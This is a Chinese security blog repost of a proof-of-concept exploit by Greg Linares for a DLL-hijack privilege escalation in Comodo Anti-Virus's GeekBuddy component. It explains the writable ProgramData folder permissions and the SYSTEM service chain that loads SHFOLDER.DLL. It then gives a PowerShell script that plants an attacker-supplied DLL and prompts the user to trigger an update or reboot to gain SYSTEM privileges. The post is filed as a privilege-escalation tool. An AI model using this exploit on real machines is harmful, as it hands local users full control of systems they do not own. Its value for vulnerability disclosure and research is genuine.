注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

[提权]Comodo Anti-Virus SHFolder.DLL - Local Privilege Elevation Exploit  

2016-04-19 17:10:44|  分类: 提权工具 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
SHFolder.DLL Local Privilege Elevation Exploit for Comodo Anti-Virus GeekBuddy Component by @Laughing_Mantis (Greg Linares)
 
Since it took 146 days to fix a DLL Hijack issue I decided to drop this PoC:
 
###Technical Geeky Stuff###
 
GeekBuddy stores several helper applications within the C:ProgramDataComodolps4temp folder.
These binaries are individual components of the Comodo Security Suite and are executed whenever
their related function is performed, updated, or uninstalled.
 
The directory listing is as follows:
10/06/2015  12:08 AM    <DIR>          .
10/06/2015  12:08 AM    <DIR>          ..
10/02/2015  10:43 PM                27 download.cfg
10/02/2015  10:47 PM           637,864 setup_clps_application_vulnerability_monitor_release-4.10.307677.9.exe
10/02/2015  10:44 PM         2,196,272 setup_clps_autoruns_manager_api_release-4.14.330616.6.exe
10/02/2015  10:44 PM           547,088 setup_clps_boot_time_monitor_release-4.12.315371.9.exe
10/06/2015  12:07 AM         1,014,024 setup_clps_browser_addons_api_release-4.0.292287.4.exe
10/02/2015  10:44 PM           554,240 setup_clps_browser_addons_monitor_release-4.12.315370.6.exe
10/06/2015  12:06 AM           950,864 setup_clps_client_transaction_release-4.19.365037.89.exe
10/06/2015  12:08 AM           563,896 setup_clps_cross_selling_installer_monitor_release-4.12.318569.13.exe
10/02/2015  10:43 PM           768,032 setup_clps_cspm_alert_monitor_release-4.19.360508.5.exe
10/06/2015  12:08 AM           581,432 setup_clps_immaturely_closed_sessions_monitor_release-4.21.366534.6.exe
10/02/2015  10:47 PM           459,432 setup_clps_memory_monitor_release-4.10.301764.3.exe
10/02/2015  10:46 PM         1,152,480 setup_clps_system_cleaner_api_release-4.2.292287.3.exe
10/06/2015  12:07 AM         1,989,272 setup_clps_system_cleaner_monitor_release-4.12.317464.8.exe
10/06/2015  12:07 AM           648,912 setup_clps_windows_event_monitor_release-4.19.362032.8.exe
10/02/2015  10:43 PM                 1 survey_version.txt
10/06/2015  12:05 AM    <DIR>          updates
 
The C:ProgramDataComodolps4temp folder has the following permission configuration:
 
C:ProgramDataComodolps4temp NT AUTHORITYSYSTEM:(OI)(CI)(ID)F
                                BUILTINAdministrators:(OI)(CI)(ID)F
                                CREATOR OWNER:(OI)(CI)(IO)(ID)F
                                BUILTINUsers:(OI)(CI)(ID)R
                                BUILTINUsers:(CI)(ID)(special access:)
                                                      FILE_WRITE_DATA
                                                      FILE_APPEND_DATA
                                                      FILE_WRITE_EA
                                                      FILE_WRITE_ATTRIBUTES
 
Notice how the folder allows Users to have FILE_WRITE_DATA and FILE_WRITE_EA access.  This allows 
non-administrator users the ability to create files in the directory but not delete or modify 
existing files.
 
Comodo's main service engine is controlled by the SYSTEM service Launcher-Service.exe which resides
in the C:Program Files (x86)Common FilesCOMODO folder.  This service is auto launched by the 
registry key HKLMSystemCurrentControlSetServicesCLPSLauncher
 
This binary will then launch Unit_Manager.exe in the C:Program FilesCOMODOGeekBuddy with SYSTEM 
level privielges.  This binary in turn then launches the binary C:Program FilesCOMODOGeekBuddyunit.exe 
to handle each sub process in the C:ProgramDataComodolps4temp folder.
 
During client connections to update servers and Geek Buddy executions the unit.exe binary will 
launch the binary setup_clps_client_transaction_release-4.19.365037.89.exe.  This setup binary has 
hardcoded DLL loading procedures to look for SHFOLDER.DLL in the current directory which it is 
executed from.
 
.data:00409240                 dd offset aShfolder     ; "SHFOLDER"
.data:00409244                 dd offset aShgetfolderpat ; "SHGetFolderPathA"
 
During this delay load procedure the exe will load SHFOLDER.DLL from its local directory before 
looking in the other PATHS variables.
 
By planting a malicious SHFOLDER.DLL in the C:ProgramDataComodolps4temp and triggering an 
update or client connection to secure servers (which occurs automatically at user login) a user can 
elevate their privileges to SYSTEM and compromise the system fully.
 
 
######### GREETZ ######################################################################################
1st off all my new homies in the Vectra Networks Research Team - you guys are seriously legit mad #respect to everyone here. #Humbled
 
@taviso - keep killing it and thanks for being an inspiration
@bill_billbil - sup girl chicken rico n chill
@tacticalRCE - Its no 100 mile rides but will miss all the good times.  C-ya around mang.
@hellNBak_ - drop tehm greetz like its 2003
@hacksforpancakes - make plans for other NullCon in 2016 ;)
@jduck - we gonna juke some more toyotas next time you come visit
@hdmoore - good luck with your ventures good sir
@jsoo - dont give up good sir - you're doing awesome
@thegrugq - when i grow up i hope im half as wise as you good sir
@daveaitel - Triangular Anus logos are the best
@da_667 - AYYYYYYYYYYYYYY LMAO
@bonovoxly - Clever Girls Wear Pink on Wednesdays
Derek Soeder - Respect to you brother, keep on being awesome
Benny 29A - next time im in CZ lets get beers, im buying
Yuji Ukai - #RESPECT to everything you have ever done and will ever do.  #Ninja
Sizzop - for fixing my greetz
 
#########################################################################################################
 
 
#>
 
Param
(
 
    [Parameter(ValueFromPipelineByPropertyName = $true)]
    [string]$DLL = ""
)
 
 
 
 
if (!(Test-Path $DLL))
{
    throw "Fatal Error: The specified file: $DLL does not exist."  
}
 
Copy-Item -Path $DLL -Destination "C:ProgramDataComodolps4tempSHFolder.dll" -Force
 
Write-Host "Copying $DLL to the Comodo AV GeekBuddy's insecure temp folder as SHFolder.dll" -ForegroundColor Red
 
 
[void][System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
 
$objNotifyIcon = New-Object System.Windows.Forms.NotifyIcon 
 
 
$MyPath = Get-Process -id $pid | Select-Object -ExpandProperty Path
$objNotifyIcon.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($MyPath)
$objNotifyIcon.BalloonTipIcon = "Info" 
$objNotifyIcon.BalloonTipText = "Hijacked SHFolder.DLL with $DLL.
Now manually update Comodo Anti-Virus using the GUI or Reboot the system to gain SYSTEM Level Privileges" 
$objNotifyIcon.BalloonTipTitle = "@Laughing_Mantis"
  
$objNotifyIcon.Visible = $True 
$objNotifyIcon.ShowBalloonTip(8000)
  评论这张
 
阅读(1088)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016